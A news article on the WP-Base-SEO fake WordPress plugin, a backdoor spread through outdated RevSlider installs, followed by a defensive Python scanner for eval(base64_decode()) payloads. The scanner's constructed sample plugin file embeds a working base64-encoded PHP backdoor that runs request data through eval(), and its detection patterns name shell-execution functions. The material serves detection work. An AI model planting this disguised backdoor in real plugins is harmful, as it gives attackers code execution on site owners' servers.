Malware masquerading as an SEO plugin called WP-Base-SEO has infected close to 4,000 WordPress sites in the last two weeks, according to security experts. The plugin presents itself as a legitimate SEO tool for the WordPress site while creating a backdoor into the targeted WordPress installation.
“They have copied the code from an existing SEO plugin, which has been tweaked to work for them. So when an SEO expert comes in and pokes through the code, it will look like a legitimate SEO plugin,” said Weston Henry, lead security analyst at security firm SiteLock, which found the fake SEO plugins. WP-Base-SEO is a bogus tool built as a forgery of a legitimate search engine optimization plugin, WordPress SEO tools.
The software is being installed through mass scanning of WordPress sites, with the attackers looking for outdated plugins or WordPress themes, Henry said. A disproportionate number of infections have been found on WordPress sites running an outdated version of the slideshow plugin RevSlider.
RevSlider is a plugin whose outdated versions have been linked to various high-profile WordPress compromises over the last several years. In April 2016, an outdated RevSlider installation was blamed for the Panama Papers breach, a 2.5 terabyte data leak. In July, attackers compromised WordPress sites running RevSlider and planted Neutrino Exploit Kit code on their pages, which attempted to install CryptXXX ransomware on visitors' machines.
“We think that RevSlider is just in the mix when it comes to vulnerabilities that adversaries are trying to exploit. It could also be that they are using stolen credentials, by using brute-force password attacks against these sites,” Henry said.
A closer examination of the WP-Base-SEO code reveals its malicious intent: a base64-encoded string is decoded and handed to PHP's eval(), according to the technical blog post in which SiteLock examines the plugin. “Eval is a PHP function that executes arbitrary PHP code. It is commonly used for malicious purposes and php.net recommends against using it,” SiteLock said.
The malicious content was found in /wp-content/plugins/wp-base-seo/wp-seo-main.php. “At first glance, the code looks legitimate, including a reference to the WordPress plugin database and documentation on how the plugin works,” according to SiteLock.
Researchers focused on two files located in the malicious WP-Base-SEO plugin directory.
“wp-seo.php, which includes the require_once for the second file, wp-seo-main.php. Wp-seo-main.php uses different function and variable names depending on the install, like wpseotools_on_activate_blog vs. bas_wpseo_on_activate_blog, and wp_base vs. base_wp_base,” wrote researchers.
“This means that any time the theme can be loaded in a browser, the request is initialized,” SiteLock said.
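Because the function and variable names change from install to install, a signature keyed on names like bas_wpseo_on_activate_blog misses the next variant; the eval(base64_decode(...)) construction is the stable part. As an added illustration, not code from SiteLock or from the plugin itself, the Python scanner below looks for that construction in PHP sources, resolves the blob when it is stored in a variable, peels nested base64 layers, and flags decoded code that executes data taken from the HTTP request. The sample plugin files, the hidden payload and the variable names are constructed for this example and are not the real wp-seo-main.php.

```python
import base64
import re

# Constructed sample files, written for this example in the style the article
# describes: a legitimate-looking header plus a base64 blob handed to eval().
# They are NOT the real wp-seo-main.php; the payload below is invented.
HIDDEN_PHP = '$c = $_REQUEST["q"]; if ($c) { eval($c); }'

SAMPLE_FILES = {
    "wp-base-seo/wp-seo.php": (
        "<?php\n"
        "/* Plugin Name: WP Base SEO */\n"
        "require_once dirname(__FILE__) . '/wp-seo-main.php';\n"
    ),
    "wp-base-seo/wp-seo-main.php": (
        "<?php\n"
        "/* See https://wordpress.org/plugins/ for how this plugin works */\n"
        "function bas_wpseo_on_activate_blog() { return true; }\n"
        "$base_wp_base = \"" + base64.b64encode(HIDDEN_PHP.encode()).decode() + "\";\n"
        "eval(base64_decode($base_wp_base));\n"
    ),
    # Benign: base64_decode on its own is common and is not what we key on.
    "wp-base-seo/readme.php": (
        "<?php\n"
        "function wpseotools_on_activate_blog() { return true; }\n"
        "$banner = base64_decode('SGVsbG8=');\n"
    ),
}

# $name = "base64text";  (string literals only; anything else is left unresolved)
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*([\'"])([A-Za-z0-9+/=\s]*)\2\s*;')
# eval(base64_decode('literal')) or eval(base64_decode($var))
EVAL_B64_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*'
    r'(?:([\'"])([A-Za-z0-9+/=\s]*)\1|\$(\w+))\s*\)\s*\)',
    re.IGNORECASE,
)
# A decoded payload that executes attacker-supplied request data is a backdoor.
REQUEST_RE = re.compile(r'\$_(?:REQUEST|POST|GET|COOKIE)\b')
EXEC_RE = re.compile(r'\b(?:eval|assert|system|passthru|shell_exec|exec)\s*\(')
B64_ONLY_RE = re.compile(r'[A-Za-z0-9+/=\s]+')


def decode_layers(blob, max_depth=5):
    """Peel nested base64 layers; stop once the text no longer looks like base64.

    Limitation: a decoded layer made only of base64-alphabet characters is
    decoded once more, so very short alphabetic payloads may be over-decoded.
    """
    text = blob
    for _ in range(max_depth):
        try:
            text = base64.b64decode("".join(text.split()), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break
        if not B64_ONLY_RE.fullmatch(text):
            break
    return text


def find_eval_payloads(php_source):
    """Return (origin, decoded_payload) for every eval(base64_decode(...)) found.

    origin is "literal" or the variable name ("$foo"); decoded_payload is None
    when the variable is not a string literal in this file (still suspicious).
    """
    literals = {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(php_source)}
    findings = []
    for m in EVAL_B64_RE.finditer(php_source):
        if m.group(3) is None:
            blob, origin = m.group(2), "literal"
        else:
            origin = "$" + m.group(3)
            blob = literals.get(m.group(3))
        decoded = decode_layers(blob) if blob is not None else None
        findings.append((origin, decoded))
    return findings


def is_backdoor(decoded):
    """True when the decoded PHP executes data taken from the HTTP request."""
    if decoded is None:
        return False
    return bool(REQUEST_RE.search(decoded)) and bool(EXEC_RE.search(decoded))


def scan_plugin(files):
    """Map each file containing an eval(base64_decode()) hit to its findings."""
    report = {}
    for path, source in files.items():
        hits = find_eval_payloads(source)
        if hits:
            report[path] = [
                {"origin": origin, "payload": payload, "backdoor": is_backdoor(payload)}
                for origin, payload in hits
            ]
    return report


if __name__ == "__main__":
    for path, hits in scan_plugin(SAMPLE_FILES).items():
        for h in hits:
            print(f"{path}: eval(base64_decode({h['origin']})) backdoor={h['backdoor']}")
            print("  decoded:", h["payload"])
```

Run it over a plugin directory by reading each .php file into the dict in place of SAMPLE_FILES. The scanner is deliberately narrow: it only understands base64_decode, so variants built on gzinflate or str_rot13 need additional patterns, and a blob assembled at runtime from several variables is reported with a None payload rather than decoded. Treat any hit as grounds to compare the plugin directory against a known-good copy rather than as the whole analysis.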
According to SiteLock, the obfuscation technique has been successful up to this point. Reviewing past infections, SiteLock said the plugin had flown under the radar as malware until now. “This highlights the critical need for web application security, including a malware scanner that can identify vulnerabilities and automatically remove malware,” SiteLock wrote.